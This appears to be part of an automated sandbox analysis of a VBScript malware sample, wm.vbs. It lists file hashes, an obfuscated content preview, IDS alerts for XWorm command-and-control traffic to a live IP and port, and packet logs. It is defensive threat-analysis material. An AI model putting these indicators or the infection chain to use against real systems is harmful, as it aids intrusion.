                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                            Malicious:false
                                            Preview:@...e...........................................................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Entropy (8bit):3.740796132518701
                                            TrID:
                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                            • MP3 audio (1001/1) 32.22%
                                            • Lumena CEL bitmap (63/63) 2.03%
                                            • Corel Photo Paint (41/41) 1.32%
                                            File name:wm.vbs
                                            File size:515'028 bytes
                                            MD5:9925d6b112cc586b4c53b9ec22ac9ee3
                                            SHA1:d3a6302d2d70999036849a9cf046ee868ba78427
                                            SHA256:c7d27223d3eeb698eeea7eac9681158f66c0091f5fc2e8ec95c979f324227373
                                            SHA512:271479f0a7b313e734cc06c26932e101b75bcc4dd0bb7c1344b0e7a888bf1d8d67289639471eb27ed643807820ecb98c621d319d35c31e8c25ba475d2056997d
                                            SSDEEP:12288:ElKHt8mQeE9b9xefCRexf049pZBJN7ZnU5AuK337QpGAgHigiHETJc:xZxDEqql
                                            TLSH:23B4E91135EA7048F1F32FA35AE965E94FBBB9662A36911E7048070F4793E80CE51B73
                                            File Content Preview:..........m.i.U.H.Z.l.u.t.k.m.N.R.q.L.K.Z.o.m.c.K.m.p.o.c.L.l.o.e.L.c.O.W.p.k.k.W.W.m.J.k.h.P.G.Z.h.L.W.a.W.k.A.G.f.k.P.k.k.u.o.L.Z.c.L.N.W.k.i.t. .=. .".G.l.U.i.K.q.W.U.W.G.e.K.K.W.k.b.W.K.W.W.I.A.e.U.R.O.a.q.P.G.O.a.p.t.W.W.Z.n.G.K.h.b.u.i.W.O.c.L.W.l.e
                                            Icon Hash:68d69b8f86ab9a86
                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                            2024-09-25T15:26:33.237775+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.9 | 49708 | 188.114.96.3 | 443 | TCP
                                            2024-09-25T15:26:33.410263+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 188.114.96.3 | 443 | 192.168.2.9 | 49708 | TCP
                                            2024-09-25T15:26:48.914993+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:26:48.914993+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:26:56.221499+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:26:56.345954+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:26:56.348028+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:08.886340+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:08.917549+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:09.216652+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:09.826591+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:09.959923+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:09.960553+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:09.961307+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:18.905785+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:18.905785+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:21.030073+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:21.031646+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:33.542279+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:33.562566+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:45.733239+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:45.737886+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:46.497478+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:46.499555+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:27:48.920023+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:48.920023+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:52.076093+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:27:52.082476+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:28:02.892902+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:28:02.894697+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            2024-09-25T15:28:14.326148+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:28:14.326621+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 135.224.23.113 | 5555 | 192.168.2.9 | 49709 | TCP
                                            2024-09-25T15:28:14.327132+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49709 | 135.224.23.113 | 5555 | TCP
                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            Sep 25, 2024 15:26:21.727787971 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:21.727844954 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:21.727911949 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:21.737657070 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:21.737689972 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.518006086 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.518090010 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:22.521954060 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:22.521976948 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.522420883 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.530569077 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:22.575407982 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.852732897 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.852772951 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.852808952 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.852989912 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:22.853025913 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.853090048 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:22.905697107 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.905725956 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.905846119 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:22.905858040 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:22.905900002 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.063558102 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.063590050 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.063688993 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.063746929 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.063769102 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.063811064 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.103521109 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.103554964 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.103751898 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.103796959 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.103914022 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.168548107 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.168571949 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.168699026 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.168730021 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.168797016 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.238240957 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.238270044 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.238421917 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.238461018 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.238535881 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.345319033 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.345341921 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.345402002 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.345416069 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.345454931 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.345473051 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.390146971 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.390165091 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.390221119 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.390232086 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.390273094 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.390285969 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.442797899 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.442837954 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.443051100 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.443072081 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.443121910 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.543469906 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.543504953 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.543567896 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.543591022 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.543601036 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.543647051 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.606905937 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.606933117 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.607042074 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.607063055 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.607127905 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.648113966 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.648144007 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.648277044 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.648302078 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.648350000 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.737786055 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.737812042 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.737989902 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.738065958 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.738153934 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.854228973 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.854260921 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.854433060 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.854454994 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.854511023 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.859827042 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.859853983 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.859994888 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.860001087 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.860095978 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.962829113 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.962856054 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.963068962 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:23.963104963 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:23.963181019 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.039020061 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.039042950 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.039100885 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.039149046 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.039175034 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.039200068 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.208882093 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.208936930 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.209019899 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.209048033 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.209069014 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.209089041 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.211457968 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.211482048 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.211546898 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.211551905 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.211577892 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.211595058 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.314390898 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.314423084 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.314516068 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.314594030 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.314634085 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.314659119 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.438810110 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.438843966 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.438903093 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.438934088 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.438952923 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.438971996 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.489847898 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.489876986 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.489995956 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.490026951 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.490071058 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.614308119 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.614335060 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.614398003 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.614474058 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.614537954 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.614537954 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.695231915 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.695266962 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.695313931 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.695348978 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.695365906 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.695430040 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.767776966 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.767797947 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.767899036 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.767908096 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.767959118 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.864979029 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.865009069 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.865134001 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:24.865158081 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:24.865194082 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:25.946888924 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:25.946907997 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:25.946986914 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:25.947052956 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:25.947078943 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:25.947108030 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:25.947132111 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.027934074 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.027966976 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.028107882 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.028150082 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.028295040 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.035192013 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.035218954 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.035279036 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.035288095 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.035303116 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.035332918 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.039675951 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.039710999 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.039762974 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.039771080 CEST | 443 | 49707 | 207.241.227.240 | 192.168.2.9
                                            Sep 25, 2024 15:26:26.039783001 CEST | 49707 | 443 | 192.168.2.9 | 207.241.227.240
                                            Sep 25, 2024 15:26:26.039813042 CEST49707443192.168.2.9207.241.227.240
                                            Sep 25, 2024 15:26:26.265213013 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.265222073 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.265284061 CEST44349707207.241.227.240192.168.2.9
                                            Sep 25, 2024 15:26:26.265322924 CEST49707443192.168.2.9207.241.227.240
